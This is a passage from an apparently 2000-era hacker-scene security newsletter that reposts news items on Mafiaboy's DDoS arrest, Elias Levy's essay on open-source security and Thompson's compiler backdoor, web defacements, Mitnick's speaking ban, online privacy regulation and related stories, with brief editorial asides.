~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 18th contributed by Evil Wench The Singapore ISP SingNet is facing increasing problems from fraud from overseas users. SingNet provides a service known as Global Roaming which allows users to connect to a local ISP to use its services to prevent long distance phone changes. SingNet says that about fifty users a month are target as fraudulent. Straits Times http://www.straitstimes.asia1.com/singapore/sin20_0407.html Dead Url @HWA 76.0 [HNN] Attrition Graphs ~~~~~~~~~~~~~~~~~~~~~~ April 18th contributed by munge Attrition.org has collected some rather interesting data regarding web page defacements that shows some clear trends in the defacements by the OS. Attrition.org http://www.attrition.org/news/content/00-04-16.001.html @HWA 77.0 [HNN] Wide Open Source ~~~~~~~~~~~~~~~~~~~~~~ April 18th contributed by Brian Is Open Source really more secure than closed? Elias Levy says there's a little security in obscurity. "Most open source users run the software, but don'9t personally read the code. They just assume that someone else will do the auditing for them, and too often, it'9s the bad guys." Security Focus http://www.securityfocus.com/commentary/19 Wide Open Source Is Open Source really more secure than closed? Elias Levy says there's a little security in obscurity. By Elias Levy April 16, 2000 11:59 PM PT One of the great rallying cries from the Open Source community is the assertion that Open Source Software (OSS) is, by its very nature, less likely to contain security vulnerabilities, including back doors, than closed source software. The reality is far more complex and nuanced. Advocates derive their dogmatic faith in the implicit security of Open Source code from the concept of "peer review," a cornerstone of the scientific process in which published papers and theories are scrutinized by experts other than the authors. The more peers that review the work, the less likely it is that it will contains errors, and the more likely it is to become accepted. Open Source apostles believe that releasing the source code for a piece of software subjects it to the same kind of peer review as a quantum physics theory published in a scientific journal. Other programmers, the theory goes, will review the code for security vulnerabilities, reveal and fix them, and thus the number of new vulnerabilities introduced and discovered in the software will decrease over time when compared to similar closed source software. It's a nice theory, and in the ideal Open Source world, it would even be true. But in the real world, there are a variety of factors that effect how secure Open Source Software really is. Sure, the source code is available. But is anyone reading it? If Open Source were the panacea some think it is, then every security hole described, fixed and announced to the public would come from people analyzing the source code for security vulnerabilities, such as the folks at OpenBSD, the Linux Auditing Project, or the developers or users of the application. There have been plenty of security vulnerabilities in Open Source Software that were discovered, not by peer review, but by black hats. But there have been plenty of security vulnerabilities in Open Source Software that were discovered, not by peer review, but by black hats. Some security holes aren't discovered by the good guys until an attacker's tools are found on a compromised site, network traffic captured during an intrusion turns up signs of the exploit, or knowledge of the bug finally bubbles up from the underground. Why is this? When the security company Trusted Information Systems (TIS) began making the source code of their Gauntlet firewall available to their customers many years ago, they believed that their clients would check for themselves how secure the product was. What they found instead was that very few people outside of TIS ever sent in feedback, bug reports or vulnerabilities. Nobody, it seems, is reading the source. The fact is, most open source users run the software, but don't personally read the code. They just assume that someone else will do the auditing for them, and too often, it's the bad guys. Even if people are reviewing the code, that doesn't mean they're qualified to do so. In the scientific world, peer review works because the people doing the reviewing possess a comparable, or higher, technical caliber and level of authority on the subject matter than the author. It is generally true that the more people reviewing a piece of code, the less likely it is the code will have a security flaw. But a single well-trained reviewer who understands security and what the code is trying to accomplish will be more effective than a hundred people who just recently learned how to program. It is easy to hide vulnerabilities in complex, little understood and undocumented source code. Old versions of the Sendmail mail transport agent implemented a DEBUG SMTP command that allowed the connecting user to specify a set of commands instead of an email address to receive the message. This was one of the vulnerabilities exploited by the notorious Morris Internet worm. Sendmail is one of the oldest examples of open source software, yet this vulnerability, and many others, lay unfixed a long time. For years Sendmail was plagued by security problems, because this monolithic programs was very large, complicated, and little understood but for a few. Vulnerabilities can be a lot more subtle than the Sendmail DEBUG command. How many people really understand the ins and outs of a kernel based NFS server? Are we sure its not leaking file handles in some instances? Ssh 1.2.27 is over seventy-one thousand lines of code (client and server). Are we sure a subtle flaw does not weakening its key strength to only 40-bits? There is no strong guarantee that source code and binaries of an application have any real relationship. All the benefits of source code peer review are irrelevant if you can not be certain that a given binary application is the result of the reviewed source code. Ken Thompson made this very clear during his 1983 Turing Award lecture to the ACM, in which he revealed a shocking, and subtle, software subversion technique that's still illustrative seventeen years later. Thompson modified the UNIX C compiler to recognize when the login program was being compiled, and to insert a back door in the resulting binary code such that it would allow him to login as any user using a "magic" password. Anyone reviewing the compiler source code could have found the back door, except that Thompson then modified the compiler so that whenever it compiled itself, it would insert both the code that inserts the login back door, as well as code that modifies the compiler. With this new binary he removed the modifications he had made and recompiled again. He now had a trojaned compiler and clean source code. Anyone using his compiler to compile either the login program , or the compiler, would propagate his back doors. The reason his attack worked is because the compiler has a bootstrapping problem. You need a compiler to compile the compiler. You must obtain a binary copy of the compiler before you can use it to translate the compiler source code into a binary. There was no guarantee that the binary compiler you were using was really related to the source code of the same. Most applications do not have this bootstrapping problem. But how many users of open source software compile all of their applications from source? A great number of open source users install precompiled software distributions such as those from RedHat or Debian from CD-ROMs or FTP sites without thinking twice whether the binary applications have any real relationship to their source code. While some of the binaries are cryptographically signed to verify the identity of the packager, they make no other guarantees. Until the day comes when a trusted distributor of binary open source software can issue a strong cryptographic guarantee that a particular binary is the result of a given source, any security expectations one may have about the source can't be transferred to the binary. Open Source makes it easy for the bad guys to find vulnerabilities. Whatever potential Open Source has to make it easy for the good guys to proactively find security vulnerabilities, also goes to the bad guys. It is true that a black hat can find vulnerabilities in a binary-only application, and that they can attempt to steal the source code to the application from its closed source. But in the same amount of time they can do that, they can audit ten different open source applications for vulnerabilities. A bad guy that can operate a hex editor can probably manage to grep source code for 'strcpy'. Security through obscurity is not something you should depend on, but it can be an effective deterrent if the attacker can find an easier target. So does all this mean Open Source Software is no better than closed source software when it comes to security vulnerabilities? No. Open Source Software certainly does have the potential to be more secure than its closed source counterpart. But make no mistake, simply being open source is no guarantee of security. Elias Levy is CTO of SecurityFocus.com, and the long-time moderator of BUGTRAQ, one of the most read security mailing lists on the Internet. He's served as a computer security consultant and security engineer, a UNIX software developer, network engineer and system administrator. @HWA 78.0 [HNN] Mafiaboy Charged for DDoS Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 19th contributed by Jon The Royal Canadian Mounted Police have charged mafiaboy early this morning in connection with the massive DDoS Attacks. Mafiaboy was originally arrested last February in connection with the attacks but was arrested again and charged over the weekend. The attacks crippled online giants such as Yahoo, CNN, eBay, ZD Net. The investigation was conducted jointly by the computer investigation unit of the RCMP, the FBI and the U.S. Justice Department. and others. The RCMP will be holding a press conferance today at 10:30a. Associated Press - via ABC News RCMP http://abcnews.go.com/sections/tech/DailyNews/webattacks000419.html http://www.rcmp.ca/html/press.htm ABC News' ‘Mafiaboy’ Arrested Canadian Teen Charged in Web Attacks Kevin Schmidt, campus network programmer at the University of California at Santa Barbara, shows the computer at the Engineering Department that detected an unauthorized entry into the university computers. (Kevork Djansezian/AP Photo) By Jonathan Dube and Brian Ross April 19 — A 15-year-old Canadian who goes by the online moniker “Mafiaboy” has been arrested in connection with the February attacks on major Web sites, ABCNEWS has learned. * Mafiaboy caught. RealVideo video available on site Canadian authorities obtained a search warrant for the teen’s home in the Montreal area over the weekend and confiscated computer-related equipment suspected of being used in the February attacks against major Web sites in the U.S. Mafiaboy, whose identity is protected under Canadian law, was arrested on April 15 and charged with “two counts of mischief to data” for the attack that jammed up to 1,200 CNN-hosted Web sites for about two hours Feb. 8, said Inspector Yves Roussel of the Royal Canadian Mounted Police at a press conference this morning. After appearing in Youth Court Tuesday, the 15-year-old was released on bail under the condition that he not use a computer without a teacher present and he not visit stores that sell computers or related equipment. The Web attacks alarmed Internet users across the globe and shook the e-commerce industry because of the ease with which major sites were made inaccessible. The attackers took over computers around the world and used them to bombard victims’ sites with so much data that users could not access them. School Computer Used in Attacks Investigators were able to trace the attacks to Mafiaboy by examining the log files of a computer at a University of California at Santa Barbara research lab, which was among those used to attack the CNN.com site. A hacker electronically broke into the UCSB computer on Feb. 8 and instructed it to send large amounts of traffic to CNN.com’s Web site, campus network programmer Kevin Schmidt told ABCNEWS.com. Roussel also said that the suspect’s bragging about his exploits in chat rooms frequented by hackers like Internet Relay Chat (IRC) had helped lead investigators to Mafiaboy. Revealing Chat Room Logs ABCNEWS.com first reported that Mafiaboy was one of the top suspects in the attacks on Feb. 16. The FBI had obtained chat room logs showing that Mafiaboy asked others what sites he should take down — before the sites were attacked. Internet security expert Michael Lyle told ABCNEWS.com at the time that he communicated with Mafiaboy and the 15-year-old claimed credit for attacking not only CNN.com but also E*TRADE and several smaller sites. Mafiaboy also shared technical information that only someone involved in the attacks would know, Lyle said. “Mafiaboy was saying ‘What should I hit next? What should I hit next?’ and people on the channel were suggesting sites, and Mafiaboy was saying, ‘OK, CNN,’” said Lyle, the chief technology officer for Recourse Technologies Inc., an Internet security company in Palo Alto, Calif. “And shortly thereafter the people on the channel would be talking about CNN going down. If you look at the time stamps on the logs, they also coincide with CNN going down.” Lyle said the log files show similar discussions prior to the Feb. 9 attacks on E*TRADE and several other smaller sites. A subscriber called “Mafiaboy” previously held two accounts with Delphi Supernet, a Montreal Internet service provider that Toronto-based ISP Internet Direct bought last year. The accounts were closed in March 1998 because Mafiaboy violated subscriber policies, but Internet Direct would not say what the violations entailed. Authorities are unable to release specifics about the investigation because it is ongoing, but both Roussel and the FBI’s William Lynn indicated there could be more arrests. “A massive international crime investigation into the remaining denial of service attacks continues,” said Lynn. ABCNEWS' Simon Surowicz contributed to this report. @HWA 79.0 [HNN] TerraServer Downtime Blamed on Malicious Activity ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 19th contributed by root66 After posting satellite pictures of the almost mythical Area 51 (Groom Dry Lake Air Force Base), an Air Force testing and training facility www.terraserver.com received over three times the normal traffic of 700,000 visitors in a day. When the server failed to respond to additional requests the company blamed malicious intruders attempting to bypass their firewall. (I'm sure three million visitors had nothing to do with it.) USA Today Associated Press http://www.usatoday.com/life/cyber/tech/cth737.htm http://dailynews.yahoo.com/h/ap/20000418/us/area_51_8.html USA today; 06/07/00- Updated 07:49 PM ET Area 51 site invaded by impish earthlings Aerial photos of alleged UFO base target of hacker high jinks Apparently the good stuff's been moved to Area 52. This satellite image of Groom Dry Lake AFB, known to UFO aficionados as Area 51, was taken by a Russian satellite in March 1998. (AP) RALEIGH, N.C. (AP) - Many Internet surfers ran into roadblocks Tuesday when they tried to reach a Web site displaying the first detailed satellite images to be made public of Area 51, the supersecret Air Force test site that UFO buffs think is a repository of alien technology. Was it hackers, as the company said? Or a case for The X-Files? The photos of the Nevada test site don't show any readily apparent signs of flying saucers or little green men among the Air Force base buildings and roadways. Raleigh-based Aerial Images Inc. - in collaboration with Kodak, Digital Equipment Corp., Autometric Inc. and the Russian agency Sovinformsputnik - posted five images of the hush-hush desert proving ground on the Web on Monday. ''This is the first glimpse into the most secret training and testing facility for the Air Force,'' said John Hoffman, president of Aerial Images. Talk about the Area 51 aerial photos However, the partners' Web site, www.terraserver.com, didn't respond much of the time Tuesday. ''The site is being hammered, and hackers are attacking it,'' Hoffman said. He said there were signs of hackers trying to penetrate the site's firewall, the software designed to prevent unauthorized outsiders from tampering with computer files. They couldn't reach the data, but they were able to slow the system, Hoffman said. He noted that the Area 51 photos had attracted an estimated 3 million ''page views'' to the Web site since Monday morning, compared with the normal usage of 700,000 to 800,000 per day. Viewing the images is free; downloading them costs $8.95 and up. Kodak will make prints for $20 to $30. The Air Force only recently acknowledged that Area 51 - the Groom Dry Lake Air Force Base - even exists. The 8,000-square-mile base is 75 miles northwest of Las Vegas, in the rugged Nellis Range. Beginning with the U-2 spy plane in the 1950s, the base has been the testing ground for a host of top-secret aircraft, including the SR-71 Blackbird, the F-117A stealth fighter and B-2 stealth bomber. The site is known as Area 51 among UFO aficionados because that was the base's designation on old Nevada test site maps. Some believe alien vehicles, unidentified flying objects, are hidden at the base and their parts are copied for U.S. prototypes. Aerial Images launched a Russian satellite in 1998 to map the Earth's surface under an open-skies agreement signed in 1992 by 24 nations, including the United States and Russia. The images have resolution good enough to distinguish a car from a truck. Several government agencies are aware of the new images and haven't responded, said Hoffman, 52. ''I've had no feedback from anybody that indicates anybody gives a hoot,'' he said. ''We acknowledge having an operating site there, and the work is classified,'' Air Force spokeswoman Gloria Cales said. The work involves ''operations critical to the U.S. military and the country's security.'' The images show hundreds of buildings including living quarters, tennis courts, a baseball field, a track and a swimming pool, plus craters in the ground. Visible roads are not paved and there are no parking lots; buses are the only visible vehicles. Some of the roads appear to run into cliffs, suggesting an underground network. Chris Carter, creator of The X-Files, apparently was skeptical when Hoffman told him of the satellite images. Some of the show's favorite themes are UFOs and secret government activities. ''He clearly didn't believe me,'' Hoffman said. ''From his tone, you could tell he didn't believe me that we had Area 51 and we had the whole area covered.'' (AREA 51, The groom lake facility uprooted and moved ages ago, it is now located in White Sands... - Ed) @HWA 80.0 [HNN] Ranum To Receives Clue Award ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 19th contributed by Bill The Internet Security Conference (TISC) will present the inaugural TISC CLUE Award to Marcus Ranum, internet security pioneer and CEO of Network Flight Recorder, Inc. The TISC CLUE Award is given to those individuals who have demonstrated that they indeed have a clue regarding Internet security systems issues, design and deployment. (WooHooo, Marcus!) The TISC CLUE Award presentation will take place Wednesday, April 26th from 12:45:00 p.m. to 1:00 p.m. at the Fairmont Hotel in San Jose, California. The TISC CLUE Award presentation is open to the public free of charge TISC http://tisc.corecom.com @HWA 81.0 [HNN] Ireland Eases Restrictions on Encryption Export Procedures ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 19th contributed by root66 Ireland, the world's largest computer software exporter, said it is relaxing rules governing the export of mass market cryptographic items used in electronic commerce to make it easier for companies to sell abroad. The Irish government said it would no longer require software companies operating in Ireland to apply for export licenses for individual products or countries. Bloomberg http://quote.bloomberg.com/fgcgi.cgi?ptitle @HWA 82.0 [HNN] Web Defacement Supports Separatists ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 19th contributed by William Knowles A web page defacement of the Guggenhiem museum in the Basque city of Bilbao was defaced last weekend by supporters of the Basque separatist group ETA. (Unfortunately the Associated Press decided to label this childish act of vandalism as sabotage. Rather strong for a web page defacement.) Associated Press - via Las Vegas Sun http://www.lasvegassun.com/sunbin/stories/tech/2000/apr/17/041700923.html Dead Url @HWA 83.0 [HNN] Exploits Protected by Copyright ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 19th contributed by Dogcow An Australian newspaper is reporting that malicious netizens may be able to claim copyright infringement in an interesting twist on copyright law in Australia that prevents reverse engineering without the permission of the copyright holder. The reverse engineering of certain tools to aid in prosecution could be prevented unless done with the copyright holders permission. Australian IT http://www.australianit.com.au/common/story_page/0,2405,582282%255E18%252D04%252D2000%255E,00.html Hackers can claim copyright on tools DAVID HELLABY ANTI-HACKER groups face problems giving evidence against groups or individuals using software developed for breaking into computer systems, because of a bizarre twist in copyright laws. Australian Computer Emergency Response Team co-founder Rob McMillan said anybody who reverse-engineered a hacking tool to see how it worked ran a risk using the evidence in court because it could be a breach of the author's copyright. The evidence may have been illegally obtained and therefore be inadmissible, he said. AusCERT was working with local lawmakers to close the loophole in intellectual property legislation, he said. "I don't know of any cases of hackers claiming copyright, but some have large enough egos to consider it," Mr McMillan said. US legislators had tackled the problem, he said. The distributed denial of service attacks that shut down several large US Web sites in February used software tools developed by hackers and distributed over the Internet. Local companies and organisations were under unprecedented attack this year, Mr McMillan said. There had been more computer security incidents reported in the first three months this year than for the whole of last year. About 2000 incidents ranging from scanning of systems to denial of service attacks were reported to AusCERT to the end of March. Mr McMillan warned the security situation was not likely to improve. "We are on the verge of a major leap in technology, but as our knowledge increases so does the knowledge of those we are up against," he said. Contrary to what some thought, AusCERT was not an enforcement organisation but assisted members with advice on dealing with security situations, he said. It was often unable to report incidents to police because a member organisation that had suffered an attack did not want it reported. But AusCERT maintained a good relationship with law enforcement authorities and often acted as a conduit for information from people and organisations that did not want to be identified, he said. @HWA 84.0 [HNN] The Erosion of Privacy on the Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 19th contributed by root66 Looks like we missed it when it first came out but the March 20 edition of Business Week has an excellent story on the state of online privacy today. They are theorize where the future could go and just how bad it might get. If you have been sitting idly by ignoring the privacy issues we suggest you read this. Business Week http://www.businessweek.com/2000/00_12/b3673001.htm It's Time for Rules in Wonderland Here's Business Week's four-point plan to solve the Internet privacy mess If Lewis Carroll had written about Alice's adventures today, she would find herself passing through the looking glass and into cyberspace. She would meet up with dodos, duchesses, and eggheads, some of whom would spout the rough equivalent of '''Twas brillig, and the slithy toves....'' The journey also would be full of rude surprises. As in Carroll's books, she would eventually discover who she really was. But many others she had never met would learn about her, too. Indeed, with every click of the mouse, a bit more of her privacy would vanish down the rabbit hole. These days, a lot of people are stumbling on similar unpleasant surprises. Thanks to a string of privacy gaffes involving DoubleClick (DCLK), RealNetworks (RNWK), Amazon.com (AMZN), and other major Web sites, consumers are learning that e-commerce companies have an intense interest in their private information. For about 9 cents, some medical data sites will sell you your neighbor's history of urinary tract infections. Your speeding tickets, bounced checks, and delayed child-support payments are an open book. In the background, advertising services are building profiles of where people browse, what they buy, how they think, and who they are. Hundreds of sites already are stockpiling this type of information--some to use in targeted advertising, others to sell or trade with other sites. GOLD RUSH. It will get worse. The tricks being played today are child's play compared with what's coming. Web sites that want to know you better will soon be able to track your movements on Web phones, palm devices, and video games, and parse the data with more subtle software. Online services can be layered with mounds of data about each person. Interactive TVs, for instance, have the potential to correlate the Web sites you visit at work with the ads you see at home in the evening. Web surfers don't need extra proof that this gold rush for personal data is alarming. In a new Business Week/Harris Poll (page 96), 92% of Net users expressed discomfort about Web sites sharing personal information with other sites. The public outcry has grown so loud that in February, search engine AltaVista Co. promised to ask explicit permission before sharing visitors' personal information with other companies. On Mar. 2, DoubleClick bowed to public pressure on a similar point: The company, which serves up ads on many Web sites, has created anonymous digital snapshots, or ''profiles,'' of millions of cybersurfers, based on where they browse and what they do online. DoubleClick had planned to link profiles with much more specific information, including names and addresses culled from real-world databases that cover 90% of American households. The company dropped that controversial plan, and within days, smaller rival 24/7 Media Inc. abandoned a similar strategy. Anonymous tracking and profiling by DoubleClick and 24/7 can be very subtle. But sometimes privacy violations hit you in the face. We have all heard the examples of sociopaths who stalk their victims online. We have seen the statistics on ''identity theft,'' in which criminals suck enough personal data off the Net to impersonate other people. Perhaps these are extreme examples. Even without them, many cybersurfers are starting to feel that they have spent quite enough time at this particular Mad Tea Party. They are ready for privacy rules that set some plain and simple boundaries. In the March Business Week/Harris Poll, 57% of respondents said government should pass laws on how personal information is collected. ''What's going on today is exponentially more threatening to those who want to protect privacy,'' says Eliot Spitzer, New York's state attorney general who has proposed privacy legislation. People can't make informed decisions on the Net because they lack the necessary information. ''What we're confronting is a market failure,'' says Spitzer. Responding to a growing chorus of privacy-related complaints, some states have drafted legislation ranging from curtailing the sale of personal information to the creation of a privacy ombudsman. But this piecemeal, state-by-state approach is a muddle. Scattershot laws will only create more confusion. Over time, they will choke budding e-business in complex litigation and red tape. Business Week believes there is a better way. Instead of a conflicting patchwork of state rules, the federal government should adopt clear privacy standards in the spirit of the Fair Information Practices--a philosophical framework for privacy protection that has been adopted worldwide over the past 25 years. The broad principles are essential: -- Companies conducting business online should be required by law to disclose clearly how they collect and use information. -- Consumers must be given control of how their data are used. -- Web surfers should also have the ability to inspect that data and to correct any errors they discover. -- And when companies break the rules, the government must have the power to impose penalties. ''All of these bits you are sending out are your digital DNA,'' says Tara Lemmey, president of the Electronic Frontier Foundation. ''You should have control of that.'' Regulation flies in the face of the approach industry has been championing. For the past four years, Net companies have insisted that they can police themselves on privacy. ''Industry initiatives and market forces are already doing a good job,'' says Daniel J. Jaye, co-founder of Engage Technologies Inc., which dishes up ads on the Web. In other words, the market will punish companies that fall afoul of consumers. Bringing in the government, execs say, will pile bureaucratic layers on top of the Net. This could undercut the very promise of efficiency that many online businesses are counting on. The Internet, they say, is supposed to draw companies closer to their customers, allowing them to anticipate their desires. With profile data, they can target their ads, slash wasteful and random marketing costs, design products faster, and build higher profit margins. Profiling provides the underpinnings of a new way of doing business upon which the Net Economy is built. Laws that require businesses to seek users' permission before they collect or use data about Web-surfing habits could kill this goose, they say. And why do that, industry execs ask, when they are making such fine strides in protecting consumer privacy? As a positive sign, Net businesses trumpet a May, 1999, Federal Trade Commission survey in which 66% of companies queried had privacy policies. SELF-REGULATORY SHAM. We are not persuaded by these arguments. Few Web sites give consumers real choices over the data that get collected online. There is no proof that if given a choice--especially bolstered with financial incentives proffered by Web merchants--consumers won't willingly hand over some personal data. As for privacy policies, the same FTC survey showed that while more than 90% of companies polled collected personal information, fewer than 10% actually followed all of the established Fair Information Practices. In short, self-regulation is a sham. The policies that companies have posted under pressure from the government are as vague and confusing as anything Lewis Carroll could have dreamed up. One simple example: When people register at Yahoo! Inc. (YHOO) for one of its services, such as My Yahoo, they are asked to provide their birth date and e-mail address--ostensibly as a safeguard if they forget their user name and need prompting. But Yahoo also uses that information for a service called the Birthday Club, sending product offers from three to five merchants to users via e-mail on their birthday. Don't look for transparency here. Most sites don't limit how they or their partners use consumer information. And Web sites can transfer information to partners without telling their own customers. Many sites also change their practices at will and without warning. Because privacy breaches are so corrosive to consumer trust, some Web execs actually welcome broad national standards. IBM (IBM) and Walt Disney Co. (DIS) have decided not to advertise on Web sites that don't have privacy policies. Privacy codes must be clearer, says Chris Larsen, CEO and founder of E-Loan Inc. (EELN), an online loan service that has its privacy policies audited. ''I think the industry has squandered the opportunity to take care of this on its own.'' IBM Chairman Louis Gerstner doesn't go that far. But he has warned Net executives that they must get serious. ''I am troubled, very troubled, by leaders who have failed to recognize our responsibility in the transformation of the new economy,'' he says. We hope other Web execs are listening closely. The policies we propose are in the best interests of Web businesses. If more consumers can be assured that their personal information is safe, more of them will flock to the Net--and click, not exit. There are other explicit benefits for the industry. Privacy standards create a level playing field, so companies don't fall into an arms war, each trying to collect the most data--at any cost. ''Business will benefit from the right level of government involvement,'' says Nick Grouf, founder of PeoplePC, which offers cheap PCs and Net connections. ''Standards are good, but they need some teeth, and this is where government becomes a good partner.'' FEDERAL STANDARD. In the long term, the privacy protection that Business Week espouses will make life simpler for businesses on the Net. More than 20 states already are moving to enact some kind of guarantees. A minimum federal standard of online privacy would decrease the cost and complexity for companies. It also would increase trust. If businesses really want to be close to their customers, trust is paramount. This approach also will shrink the gap that has arisen between the U.S. and Europe, where privacy already is recognized as a right. The Europeans have stood firm, putting American companies in the peculiar position of extending greater privacy protection in Germany or France than at home. It's time to iron out the inconsistencies. Here are our prescriptions for protecting personal privacy without jeopardizing the promise of e-commerce... @HWA 85.0 [HNN] MafiaBoy Released on Bail ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 21st contributed by Macki MafiaBoy, a fifteen year old teenager from Montreal, has been released on bail after appearing Monday in Youth Court for having been accused of launching a DDoS attack on CNN. He was released under bail conditions that included a ban on connecting to the Internet or going to libraries, universities, stores and other places with public access to computers or computer equipment. An RCMP investigator said the boy was tracked through traces he left of his computer activity. (The interesting part is that he has only been charged with the CNN attack which means he either covered his tracks rather well on the others or there are more perpetrators yet to be found.) Nando Times MafiaBoy IRC Logs 2600 Magazine has posted what they say are IRC logs of someone posing as Mafiaboy to investigators. Hopefully the FBI is not using these same fake logs as evidence. 2600.com http://www.nandotimes.com/technology/story/body/0,1634,500194839-500265475-501381121-0,00.html http://www.2600.com/news/2000/0420.html @HWA 86.0 [HNN] Mitnick Banned from Speaking ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 21st contributed by William Knowles A Federal Judge has ruled that Kevin Mitnick can not speak at the Utah Information Technologies Association conference in Salt Lake City. The Judge felt that the conference was "consulting or advising" which is prohibited by his probation agreement. Organizers are hoping to fill the slot with an industry executive. Desert News http://deseretnews.com/dn/view/0,1249,160008642,00.html? Federal judge bans convicted hacker from taking part in tech conference A federal judge Monday banned convicted computer hacker Kevin Mitnick from taking part in a technology conference in Salt Lake City Wednesday. Mitnick, who gained notoriety for his hacking exploits and spent several years in a federal prison in Lompac, Calif., won't be sitting on a computer security panel discussion at the Utah Information Technologies Association conference at the Salt Palace Convention Center. The judge kiboshed the appearance because Mitnick's prison release agreement prohibits him from "consulting or advising" on the topic of computer-related activity. Monday, Mitnick did an extended interview promoting the panel discussion on KSL's Doug Wright Show, where he answered callers' questions about computer security and told the story of his hacking exploits. He hacked for fun, he said, and never made any money from it. Richard Nelson, president of UITA, said Mitnick's public relations representative had indicated that Mitnick had permission to appear from the U.S. probation office in California. A few days ago, the organization learned he might not be able to leave California. Conference organizers are in the process of arranging a replacement for Mitnick on the cyber-security panel. They are planning on bringing in a senior staffer from a large company that deals with cyber security. Nelson said he's sorry Mitnick can't participate. "He's eager to talk and disappointed he can't come. If you listened (to him on the radio show), he recognizes he made serious mistakes and he wanted to go forward. "We're not trying to promote his career, but if he can help information technology companies in Utah and decision makers dealing with security issues determine what level of risk they want to take, that's good. There will always be risk, but you can reduce it by taking security measures." The UITA conference, "Net Trends 2000: The Digital Revolution" takes place Wednesday and Thursday. @HWA 87.0 [HNN] Top Politicos Meet to Discuss Infrastructure Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 21st contributed by Weld Pond We have seen numerous press reports regarding a recent meeting at the Old Executive office building in support of the Critical Information Assurance Office. Several top level officials attended the meeting. Probably the best description of the event we have found was posted by Russ Cooper to NTBugTraq. NT BugTraq http://www.NTBUGTRAQ.COM/default.asp?pid Not found. tried searching archives but didn't spend too much time. - Ed @HWA 88.0 [HNN] NSF To Issue Grants for Security Schooling ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 21st contributed by mortel Applications for grants for the Federal Cyber Services program should be released by the National Science Foundation next month. The grants will be used by Colleges and Universities to award scholarships to students studying information security. Federal Computer Week http://www.fcw.com/fcw/articles/2000/0417/web-cyber-04-19-00.asp NSF launching grants for cybercorps BY Colleen O’Hara 04/19/2000 RELATED STORIES "Wanted: Digital defenders" [Federal Computer Week, Jan. 24, 2000] More from FOSE "Litronic to secure DOD e-mail" "Experts give geography lesson" "Reno: Communication barrier to accessibility" "Compensation for IT workers gets closer look" "JetForm unveils 'Jaguar'" The National Science Foundation is expected to release applications next month for grants that would fund the Federal Cyber Services program designed to train the next generation of digital defenders. The NSF grants would be available to colleges and universities, which would use the money to award scholarships to students to study information assurance. These students would receive the scholarships in exchange for full-time employment with a federal agency upon graduation. The students would help protect the government’s systems from cyberattack. NSF hopes to announce by September or October which schools will receive the grants and hopes to award the actual student scholarships by January 2001, said Shirley Malia, program manager for education and training with the government’s Critical Infrastructure Assurance Office, speaking at the FOSE conference. Malia said plans also are under way to establish a virtual nationwide network of training centers that offer information assurance courses. The courses would match a set of competencies for information assurance professionals that the Office of Personnel Management is developing. The hope is that agencies would use these centers to keep their cybersecurity workers trained. "If we don’t keep the skills of information assurance [workers] up-to-date, we are extremely vulnerable," Malia said. The Cyber Services and virtual training network projects are dependent on fiscal 2001 funding to proceed, Malia said @HWA 89.0 [HNN] CalPoly Charges Student with Port Scanning ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 21st contributed by Zorro The California Polytechnic State University has charged computer engineering sophomore Paul Reed, with a violation of Title V of the California Code of Regulations. Mr. Reed was attempting to find a machine within a DHCP range that was located at a company he worked for off campus but he conducted his scan from his dorm room using the CalPoly computer network. Free Paul http://freepaul.org/ @HWA 90.0 [HNN] Encrypted Sheet Music Available on Net Soon ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 21st contributed by root66 Net4music, which has been given access to one million of EMI's songs will start to post the sheet music to the Net by the end of April. Net4music will sell sheet music at $3.95 per download but will use use a software lock to only allow five printouts of the music. (Five? All people need is one copy, and access to a photocopier.) Wired http://www.wired.com/news/culture/0,1284,35735,00.html EMI Plays Along with Downloads by Brad King 3:00 a.m. Apr. 19, 2000 PDT Musicians who want to play along with Aerosmith, Lenny Kravitz, or The Counting Crows will soon have access to EMI Music Publishing's sheet music library online. The subsidiary of the EMI music label on Tuesday said it will give digital rights management company Net4Music access to one million of the label's songs in exchange for a minority equity stake. Net4Music will post 1,000 titles on its site by the end of April, and then will add 10,000 songs each month until 100,000 songs are posted. This is the first time a major label has taken steps to have its entire catalog encoded and sold in digital format. "This is a niche market for musicians and people who are looking for sheet music to play," said Martin Bandier, CEO of EMI Publishing. "It's tough to find a music store that sells sheet music. Now all you have to do is have a computer terminal." Net4Music will offer single songs for $3.95 per copy, but the downloads will feature encryption that limits the number of printouts that can be made. Similar types of digital encryption that limit the reuse of content after purchase, such as SDMI, InterTrust, and Sony's memory stick, have been failures with consumers. Meanwhile, other attempts at securing content, like Windows Media Audio, Liquid Audio, and e-books, have proven too easy to circumvent. Francois DuLiege, CEO of Net4Music, said his encryption system will not discourage consumers. "You will pay less for five copies of digital sheet music than you would for one copy of sheet music if you went to a retail store," he said. "Most songs in retail stores don't sell single sets of music, so you have to purchase the whole package. This, I believe, is much easier for consumers." The major music labels have been slow to make recorded music and compositions available in digital form, but rights management company Sunhawk set a precedent by signing a deal in 1998 to digitize content from Warner Music's music catalog. Sunhawk has been digitizing Warner's Christian music for two years, but has only digitized about 10,000 songs thus far, having branched out to encode and digitize other media beyond music. EMI's Bandier believes the Net4Music deal will expand demand for EMI content. "The Christian music business is a small homespun business that is dependent upon the congregation and others knowing all the lyrics to the music, so getting that content out there as quickly as possible was important," Bandier said. "But that only makes up about 5 percent of our business." Sunhawk CEO Marlin Eller said the deal will only help move the music industry to embrace digital e-commerce. "This validates exactly what we are trying to do digitally," Eller said. "Industry executives should learn to get off their butts and license their 